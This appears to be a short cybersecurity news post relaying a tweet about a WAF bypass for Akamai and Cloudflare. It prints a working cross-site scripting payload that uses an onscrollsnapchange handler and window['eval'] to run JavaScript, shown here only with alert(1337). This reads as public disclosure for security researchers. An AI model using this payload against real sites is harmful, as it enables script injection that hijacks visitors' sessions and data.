A WAF bypass has been discovered for Akamai and Cloudflare. The payload used is <address onscrollsnapchange=window['eval']('alert(1337)'); style=overflow-y:hidden; scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>. This bypass allows executing arbitrary JavaScript code. More details can be found in the tweet: https://t.co/y0mBjTV7JR
For more insights, check out the original tweet here: https://twitter.com/IArVy0x/status/1932077305343451387. And don’t forget to follow @IArVy0x for more exciting updates in the world of cybersecurity.
Subscribe for the latest news: